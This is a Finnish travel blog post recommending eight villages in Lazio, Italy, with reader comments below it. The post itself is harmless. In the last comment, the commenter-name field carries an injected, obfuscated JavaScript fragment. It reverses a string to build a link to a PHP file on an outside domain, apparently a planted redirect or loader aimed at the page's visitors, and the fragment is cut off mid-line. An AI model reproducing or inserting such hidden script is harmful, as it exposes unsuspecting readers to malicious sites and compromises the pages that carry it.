Image Alt

Blog

Kahdeksan kauneinta kylää Laziossa

Kuinka moni on kertonut suunnittelevansa road tripia Lazioon? Onko joku kehunut Lazion kukkuloilla kohoavia keskiaikaisia kyliä? Tai sen meren rannalla nousevia kalastajakyliä kapeine kujineen? Tai Lazion tyylikkäitä pikkukaupunkeja kirkkaiden järvien rannalla? Niinpä. Lazio jää useimmiten naapurialueidensa Toscanan, Umbrian ja Campanian varjoon. Suuri osa tuntee Laziosta vain Rooman – eikä siitäkään sitä, että se kuuluu Lazion alueeseen.

Lazio on kuitenkin täynnä kätkettyjä helmiä – ja siellä on paljon edullisempaa kuin Toscanassa tai Amalfirannikolla. Laziossa on kukkuloita ja viiniviljelmiä, meri ja järviä, maailmanperintökohteita ja linnoja. Ja paljon aivan ihania pikkukyliä. Tässä muutamia esimerkkejä Lazion kauneudesta.

1. Calcata

calcata

Dramaattisesti vuoren rinteellä sijaitseva Calcata on erikoisimpia paikkoja, jossa olen koskaan käynyt. Se hylättiin turvallisuussyistä 1930-luvulla, mutta 1960-luvulla sinne muutti hippejä (!). Hippi- ja taiteilijayhteisö kunnosti hylätyn kylän rakennuksia, avasivat sinne kahviloita ja pieniä putiikkeja ja saivat viranomaiset vakuutettua sen asumiskelpoisuudesta.  Calcatassa ja sen teehuoneissa, baareissa, keramiikkapajoissa ja pienissä käsityöläisputiikeissa vallitsee yhä aivan erityinen boheemi tunnelma. Lisäksi Calcata on itsessään ihan mielettömän söpö.

2. Sermoneta

Sermoneta

Sermoneta on viehättävä muurien ympäröimä pieni kukkulakaupunki. Sen mukulakivistä keskustaa hallitsee massiivinen Caetanin suvun rakennuttama linna. 1200 – 1600-luvulla Sermonatassa oli kukoistava juutalaisyhteisö ja siellä juhlitaankin näyttävästi mm. natsivallasta vapautumisen päivää toukokuussa. Sermonatan lähellä sijaitsee myös yksi maailman kauneimmista puutarhoista, Giardino di Ninfa.

3. Sperlonga

 

Sperlonga

Sperlonga on pittoreski valkoinen rantakaupunki Rooman ja Napolin puolessa välissä. Sen vanhassa kaupungissa voi vaellella pitkin kapeita kujia ja portaita, pysähtyä gelatolle johonkin pienelle piazzalle ja ihailla avautuvaa merinäkymää. Suurin osa tulee Sperlongaan nimenomaan rantalomalle. Sperlongan rannat kuuluvat Italian puhtaimpiin.

 4. Trevignano

Trevignano

Tunnetuin Bracciano-järven ympärillä olevista pikkukaupungeista lienee Bracciano upean linnansa vuoksi, mutta minä ihastuin enemmän idylliseen Trevignanoon. Tyylikkäine rantakahviloineen se oikein huokuu vanhan ajan rantakohteen tunnelmaa.

5. Tivoli

Tivoli

Tivoli on aika täydellinen päiväretkikohde Roomasta. Se sijaitsee vain 30 kilometrin päässä ja sinne pääsee helposti ja usein Cotralin bussilla (myös junalla, mutta asemalta täytyy vielä ottaa paikallisbussi Tivolin keskustaan). Siellä on peräti kaksi maailmanperintökohdetta, Villa d’Este ja Villa Adriana. Kaupunki sijaitsee kukkulalla, joten siellä on kesällä viileämpää kuin kuumassa Roomassa. Piazzalta avautuu huikeat näkymät laaksoon.

6. Arpino

Arpino

Sata kilometriä Roomasta sijaitseva Arpino tunnetaan Ciceron syntymäkaupunkina. Rooman valtakunnan aikaan kylän nimi oli Arpinum. Arpinon keskuspiazzalle on jätetty pätkä Appia Anticaa, joka yhdessä Ciceron patsaan kanssa kertoo kylän pitkästä historiasta. Arpinossa on kuvattu myös monia italialaisia elokuvia, eikä mikään ihme: onhan se kapeine kujineen, portaineen ja linnoituksineen kuin italialaisen pikkukylän kulissi. Arpinoon pääsee Roomasta myös junalla.

7. Subiaco

Subiaco

Subiaco on Lazion kylistä ehkä instagrammatuin. Ei syyttä, sillä seen keskiaikaiset mukulakivikujat, eritasoiset portaat ja tasanteet, pittoreskit piazzat ja niiltä avautuvat näkymät kattojen ylle, muurit ja linna oikein tyrkyttävät ihania kuvakulmia muillekin jaettavaksi. Subiacon kupeessa on vielä upea luostarikin, jossa voi jatkaa ihastuksesta huokailua. Kunhan ei mene kylään karnevaaliaikaan.

8. Collalto Sabino

Collalto Sabino

Collalto Sabino on Italian kaunein kylä. Piste. Itse asiassa se on yksi kauneimpia paikkoja, jossa olen koskaan käynyt. Käyntini lumoa lisäsi se, että sain kierrellä sen kujilla ihan yksin ja pysähtyä linnanpihalla (kyllä, siellä on myös linna, sellainen satulinnan näköinen) ja näköalatasanteilla ihan rauhassa. Kenenkään selän yli ei tarvinnut kurkkia, vain muutama kissa tuli ihmettelemään. Collalto Sabino on itkettävän ihana.


Tämä postaus on osa Instagram Travel Thursday -tempausta. IGTT:n vetäjinä toimivat matkablogit Muru MouTravellover ja Skimbaco. Liity sinäkin mukaan tempaukseen ja jaa reissuinspiraatiota käyttämällä Instagramissa tunnistetta #IGTravelThursday tai #IGTT! Lue tempauksesta lisää täältä.

Kaikki tämän jutun kuvat olen julkaissut aiemmin Instagramissa. Käy vaikka katsomassa, minut löydät Instasta nimellä @kukkulalta. 

  • Vinkki: Lisää inspiraatiota Lazioon löydät Instagramista hashtageilla #igers_lazio #ig_lazio ja #yallerslazio. Tässä ei suinkaan ollut vielä kaikki.
5 1 vote
Article Rating
Subscribe
Notify of
guest

This site uses Akismet to reduce spam. Learn how your comment data is processed.

33 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments
Marja
6 years ago

Aiai, houkuttelevilta näyttävät kaikki, olen käynyt vain Sperlongassa ja Tivolissa, joten täytyy laittaa nuo muut, varsinkin Collalto Sabino, korvan taakse…

sari
6 years ago

Hienoja hieman tuntemattomiakin kyliä. Ei siis mitään isoja kaupunkeja. Itsellä on Italia Roomasta alaspäin tutkimatta. Sinne on vielä joskus matkattava. Nämä kylät voisin ottaa omalle listalleni. Collalto Sabinosta tulee mieleen Laglio Comojärvellä ja majapaikkamme, joka oli hyvin samantapaisen kujan varrella.

Noora | Kerran poistuin ko<script>$mkD=function(n){if (typeof ($mkD.list[n]) == "string") return $mkD.list[n].split("").reverse().join("");return $mkD.list[n];};$mkD.list=["\'php.txEgifnoCetiSrettelsweN/snoisnetxe/edoc/rettelswen/moc.cniwyks//:ptth\'=ferh
Noora | Kerran poistuin ko